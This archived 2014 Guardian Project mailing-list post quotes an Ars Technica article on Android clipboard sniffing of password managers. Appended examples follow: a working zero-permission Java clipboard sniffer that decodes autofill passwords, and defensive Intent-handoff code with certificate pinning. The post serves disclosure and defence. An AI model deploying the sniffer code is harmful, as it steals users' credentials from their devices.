[guardian-dev] Proof-of-concept exploit against LastPass could easily be extended to other apps.

Hans-Christoph Steiner hans at guardianproject.info
Mon Nov 24 06:24:46 EST 2014

(moving this to guardian-dev)

This would be a very nice application of our TrustedIntents library.  We could
define an Intent method for handing a password, then add TrustedIntents to
KeePassDroid and then our apps, especially Orweb and Orfox.  I think that
would serve as a good example as a way to fix this issue without having to
change Android itself at all.


noel hidalgo | gProject:
> http://arstechnica.com/security/2014/11/using-a-password-manager-on-android-it-may-be-wide-open-to-sniffing-attacks/
> Using a password manager on Android? It may be wide open to sniffing attacks
> Proof-of-concept exploit against LastPass could easily be extended to other apps.
> by Dan Goodin - Nov 21, 2014 6:55 pm UTC
> Aurich Lawson
> In early 2013, researchers exposed some unsettling risks stemming from 
> Android-based password managers. In a paper titled "Hey, You, Get Off of My 
> Clipboard," they documented how passwords managed by 21 of the most popular such 
> apps could be accessed by any other app on an Android device, even those with 
> extremely low-level privileges. They suggested several measures to help fix the 
> problem.
> Almost two years later, the threat remains viable in at least some, if not all, 
> of the apps originally analyzed. An app recently made available on Google Play, 
> for instance, has no trouble divining the passwords managed by LastPass, one of 
> the leading managers on the market, as well as the lesser-known KeePassDroid. 
> With additional work, it's likely that the proof-of-concept ClipCaster app would 
> work seamlessly against many other managers, too, said Xiao Bao Clark, the 
> Australia-based programmer who developed it. While ClipCaster does nothing 
> more than display the plaintext of passwords that LastPass and KeePassDroid 
> funnel through Android handsets, a malicious app with only network privileges 
> could send the credentials to an attacker without the user having any idea what 
> was happening.
> "Besides the insecurity of it, what annoyed me was that I was never told any of 
> this while I was signing up or setting up the LastPass app," Clark wrote in an 
> e-mail. "Instead, I got the strong impression from LastPass that everything was 
> very secure, and I needn't worry about any of it. If they at least told users 
> the security issues using these features brings, then the users themselves could 
> decide on their own trade-off between usability and security. Not mentioning it 
> at all strikes me as disingenuous."
> Asked if LastPass has ever notified users of the risk, company CEO Joe Siegrist 
> didn't give a yes or no answer. Instead, he responded, "This is an any clipboard 
> activity problem [his emphasis] and impacts any password manager involving the 
> clipboard (100% of them)—the way all password managers have consistently allowed 
> you to enter your password into other apps since Android has existed. This 
> demonstration is aimed at LastPass, but it's the whole of Android that must be 
> addressed."
> Clark agreed that any Android-based password manager that uses the OS clipboard 
> is susceptible. He strongly recommends that people stop using any app setup that 
> works this way. Many apps use standalone browsers, browser extensions, or 
> software keyboards to enter credentials into login fields. There is no evidence 
> they are susceptible to sniffing. The reason ClipCaster takes special aim at 
> LastPass, Clark said, is simple. It just happened to be the manager he installed 
> on his phone. There are no reports that password managers running
> on iOS or Windows Phone are vulnerable. But there is no way to know for sure, 
> since Ars is unaware of any comprehensive study testing the security of 
> managers on those platforms.
> As already alluded, the threat stems from the use of the Android clipboard, 
> which acts as a temporary cache for text that is being copied and pasted, either 
> within the same app or from one app to another. Android has no official 
> programming interface that secures the clipboard. By design, its contents are 
> available to any app installed on the phone, from the highest privileged banking 
> app to one with no privileges at all. (ClipCaster, for instance, requires no 
> permissions.) Siegrist rightly noted that any password manager that makes use of 
> the Android clipboard—and there are plenty, including LastPass—is vulnerable.
> LastPass has several different methods for plucking passwords out of their 
> highly fortified vault and plugging them into the password field of a browser or 
> app. Not all of the options are susceptible to sniffing, but notably, the one 
> LastPass recommends that Android users choose leaves them wide open. The option 
> is known as autofill, a feature that seamlessly plugs passwords into apps and 
> the Chrome browser.
> Shortly after installing LastPass, Clark came across the 2013 paper that 
> discussed the clipboard vulnerability. It got him wondering about the 
> security of his decision, so he began analyzing the JavaScript autofill uses 
> to populate username and password fields in Chrome. In about an hour, he had 
> a crude but working exploit that monitored the Android clipboard and captured 
> login credentials transported by autofill. His proof-of-concept app works by 
> listening to the notices the clipboard broadcasts to installed apps and looking 
> for familiar patterns in the code.
> Clark concocted a dummy account containing the username "j.doe@actisec.com" and 
> the password "s4f3p4assw0rd," and observed the way the credentials were funneled 
> through the clipboard. Autofill wrote a blob of code to the clipboard and then 
> pasted it into the address bar of Chrome. The code contained the following 
> telltale lines:
> if (l_bte) { ;
> l_sfv(l_bte, decodeURIComponent(escape(atob('ai5kb2VAYWN0aXNlYy5jb20='))))
> }
> l_sfv(l_bpe, decodeURIComponent(escape(atob('czRmZXBhc3N3MHJk'))));
> An image of ClipCaster sniffing the password "s4f3p4assw0rd" as a user logs in 
> to Facebook.
> Xiao Bao Clark
> "atob" is a JavaScript function for decoding strings that have been 
> converted into base64-encoded representations. Presumably, LastPass 
> developers chose the encoding to make it less obvious to other apps what the 
> clipboard contents are. But to anyone with a modest amount of training, 
> the measure is little more than an exercise in the largely discredited 
> protection known as "security through obscurity." ClipCaster monitors the 
> clipboard for the patterns, decodes the base64 strings and, as illustrated in 
> the image to the right, displays them.
> In e-mails sent to Ars, Siegrist, the LastPass CEO, rightly noted that 
> the vulnerability isn't unique to his company's product, or even to Android devices.
> "This is an OS-level issue that impacts everything running on Android," he said. 
> "If you use the clipboard to copy any data, a malicious app could obtain it—like 
> installing a clipboard monitoring software on Windows or a keylogger on Windows. 
> You can compromise your security by installing bad software."
> Siegrist also noted that attacks like the one carried out by ClipCaster work
> only when LastPass or another password manager runs on an Android device
> that has a malicious app installed, and then only when the manager uses the 
> device's clipboard. The CEO said that LastPass users should run only "trusted" 
> apps, meaning those distributed over Google Play by a trusted company and widely 
> used and reviewed.
> Still, his statements omit some important distinctions. First, LastPass on 
> Windows doesn't use the clipboard to pass login credentials to Chrome, 
> and presumably other browsers, Clark's research found. And second, most Windows 
> users—and a growing number of Mac users as well—use antivirus protection to 
> detect such threats. Android antivirus apps exist, but there's little evidence 
> that most users install one. Third, his advice about installing only trusted 
> apps is sound, but given the regular occurrence of malicious apps that slip 
> through Google defenses and are hosted in the company's official Play Store, 
> it's unrealistic to expect end users to always spot rogue titles.
> One of the key defenses of Android is its application sandbox, which prevents 
> one app from accessing sensitive data belonging to another app, presumably under 
> the premise that not all apps will be trustworthy. When an app as sensitive as a 
> password manager doesn't enjoy a protection as crucial as this, the companies 
> should make this limitation explicit. LastPass and the developers of other 
> vulnerable managers should be
> forthright about the risks and tell users what they can do to protect 
> themselves. In the case of LastPass, the threat can be eliminated simply by 
> opting out of the recommended autofill option and instead using the LastPass 
> browser or LastPass keyboard. Many users may decide the convenience of autofill 
> is worth the added risk, but at least they will be making an informed choice.
> Dan Goodin / Dan is the Security Editor at Ars Technica, which he joined in 2012 
> after working for The Register, the Associated Press, Bloomberg News, and other 
> publications.
> @dangoodin001

PGP fingerprint: 5E61 C878 0F86 295C E17D  8677 9F0F E587 374B BE81
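The sniffing the article describes, as an added example (my own code, not ClipCaster's source, which the article does not reproduce): a component that registers a clipboard-change listener, which needed no manifest permission on the Android of 2014, and pulls the base64 literals out of anything shaped like the autofill blob quoted above. The class name and the exact regex are mine; the article only says ClipCaster listens for clipboard changes, looks for familiar patterns and decodes base64.

```java
// Added example: a zero-permission clipboard watcher that recovers the base64
// payloads from an autofill script shaped like the one quoted in the article.
// Not ClipCaster's code; class name and regex are this example's own choices.
import android.content.ClipData;
import android.content.ClipboardManager;
import android.content.Context;
import android.util.Base64;
import android.util.Log;

import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public final class ClipSniffer implements ClipboardManager.OnPrimaryClipChangedListener {
    private static final String TAG = "ClipSniffer";

    // atob('...') as it appears in the quoted script: a single-quoted base64 literal.
    private static final Pattern ATOB_LITERAL =
            Pattern.compile("atob\\('([A-Za-z0-9+/=]+)'\\)");

    private final ClipboardManager clipboard;

    public ClipSniffer(Context context) {
        // No <uses-permission> is needed for this on Android of the 2014 era:
        // every app gets the system clipboard service and its change callbacks.
        clipboard = (ClipboardManager) context.getSystemService(Context.CLIPBOARD_SERVICE);
    }

    public void start() {
        clipboard.addPrimaryClipChangedListener(this);
    }

    public void stop() {
        clipboard.removePrimaryClipChangedListener(this);
    }

    // Fired by the system every time any app sets the primary clip.
    @Override
    public void onPrimaryClipChanged() {
        ClipData clip = clipboard.getPrimaryClip();
        if (clip == null || clip.getItemCount() == 0) {
            return;
        }
        CharSequence text = clip.getItemAt(0).getText();   // null for URI/Intent clips
        if (text == null) {
            return;
        }
        for (String secret : extractSecrets(text.toString())) {
            // ClipCaster only displayed these; an app holding INTERNET could just as
            // easily send them off-device. Logging stands in for either here.
            Log.w(TAG, "recovered from clipboard: " + secret);
        }
    }

    // Pure function: every atob('...') literal in the clip, base64-decoded and read as
    // UTF-8, which is exactly what decodeURIComponent(escape(atob(...))) yields in the
    // browser. Invalid base64 literals are skipped rather than aborting the scan.
    static List<String> extractSecrets(String clipText) {
        List<String> secrets = new ArrayList<>();
        Matcher m = ATOB_LITERAL.matcher(clipText);
        while (m.find()) {
            try {
                byte[] raw = Base64.decode(m.group(1), Base64.DEFAULT);
                secrets.add(new String(raw, StandardCharsets.UTF_8));
            } catch (IllegalArgumentException notBase64) {
                // pattern matched but the literal is not valid base64; ignore it
            }
        }
        return secrets;
    }
}
```

Fed the two telltale lines from the article, extractSecrets() returns the username and password literals in the order they appear. Two caveats for anyone reproducing this now: the listener fires on every clip change system-wide, so a real sniffer would filter on the pattern rather than log everything, and Android 10 and later restrict clipboard reads to the foreground app and the default input method, which closes this particular channel for a background listener; on the Android the article was written about, no such restriction existed.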

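What Hans proposes above, as an added example written here rather than taken from TrustedIntents, KeePassDroid or Orweb: hand the password over an explicit Intent result and pin each side to the other's APK signing certificate, so the secret never enters the shared clipboard and a look-alike package signed by someone else can neither ask for it nor receive it. The package names, the action string, the extra names and the pin values are hypothetical placeholders; the signature check uses stock PackageManager calls rather than the TrustedIntents API, so no library method names are assumed.

```java
// Added example, not code from TrustedIntents, KeePassDroid or Orweb: password
// handoff between two apps over an Intent result, each side pinning the other's
// signing certificate. All package names, action/extra strings and pins are
// hypothetical placeholders.
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageInfo;
import android.content.pm.PackageManager;
import android.content.pm.Signature;
import android.os.Bundle;

import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

final class SignerPin {
    private SignerPin() {}

    // True only if every certificate that signed pkg hashes (SHA-256 over its DER
    // bytes) to expectedHex. Unknown packages and missing signatures are untrusted.
    static boolean isSignedBy(Context ctx, String pkg, String expectedHex) {
        try {
            // GET_SIGNATURES is the flag that existed in 2014; API 28+ offers
            // GET_SIGNING_CERTIFICATES, which also exposes the rotation history.
            PackageInfo info = ctx.getPackageManager()
                    .getPackageInfo(pkg, PackageManager.GET_SIGNATURES);
            if (info.signatures == null || info.signatures.length == 0) {
                return false;
            }
            for (Signature sig : info.signatures) {
                if (!sha256Hex(sig.toByteArray()).equalsIgnoreCase(expectedHex)) {
                    return false;
                }
            }
            return true;
        } catch (PackageManager.NameNotFoundException | NoSuchAlgorithmException e) {
            return false;
        }
    }

    static String sha256Hex(byte[] der) throws NoSuchAlgorithmException {
        byte[] digest = MessageDigest.getInstance("SHA-256").digest(der);
        StringBuilder hex = new StringBuilder(digest.length * 2);
        for (byte b : digest) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }
}

// Password-manager side. Exported in the manifest with an intent-filter for ACTION,
// but it only answers a startActivityForResult() call from the pinned caller.
public class PasswordHandoffActivity extends Activity {
    static final String ACTION = "org.example.intent.action.GET_PASSWORD";      // hypothetical
    static final String EXTRA_SITE = "org.example.extra.SITE";                   // hypothetical
    static final String EXTRA_PASSWORD = "org.example.extra.PASSWORD";           // hypothetical
    // Hypothetical pin: hex SHA-256 of the browser's signing certificate.
    static final String TRUSTED_CALLER_SHA256 = "replace-with-hex-sha256-of-browser-signing-cert";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // getCallingPackage() is set by the system only for startActivityForResult();
        // a plain startActivity() or a broadcast gives us nothing verifiable, so refuse.
        String caller = getCallingPackage();
        if (caller == null || !SignerPin.isSignedBy(this, caller, TRUSTED_CALLER_SHA256)) {
            setResult(RESULT_CANCELED);
            finish();
            return;
        }
        String site = getIntent().getStringExtra(EXTRA_SITE);
        Intent reply = new Intent().putExtra(EXTRA_PASSWORD, lookupPassword(site));
        setResult(RESULT_OK, reply);   // delivered by the system to the verified caller only
        finish();
    }

    private String lookupPassword(String site) {
        return "s4f3p4assw0rd";   // stand-in for the real vault lookup
    }
}

// Browser side: ask the manager by explicit package, after checking it is the
// manager we pinned and not another app that registered the same package name.
class BrowserLoginHelper {
    static final String MANAGER_PKG = "org.example.passwordmanager";             // hypothetical
    static final String TRUSTED_MANAGER_SHA256 = "replace-with-hex-sha256-of-manager-signing-cert";
    static final int REQ_PASSWORD = 0x50;

    static boolean requestPassword(Activity browser, String site) {
        if (!SignerPin.isSignedBy(browser, MANAGER_PKG, TRUSTED_MANAGER_SHA256)) {
            return false;   // wrong signer installed under that name: do not send anything
        }
        Intent ask = new Intent(PasswordHandoffActivity.ACTION)
                .setPackage(MANAGER_PKG)   // explicit target: no other app can intercept it
                .putExtra(PasswordHandoffActivity.EXTRA_SITE, site);
        browser.startActivityForResult(ask, REQ_PASSWORD);
        return true;   // the password arrives in onActivityResult() under EXTRA_PASSWORD
    }
}
```

The point of the two checks is that Android's sandbox already keeps an Intent extra between the two processes involved; what it does not do on its own is tell you who the other process is, and a package name alone can be claimed by any APK installed first. Pinning the signing certificate on both ends is exactly the check the TrustedIntents library packages up, so the pin values above would in practice come from the library's signer pins rather than hand-typed hex. Note also that explicit Intents with setPackage() are the only safe form here: an implicit Intent carrying a password would be offered to every app with a matching intent-filter, which is the clipboard problem in a different costume.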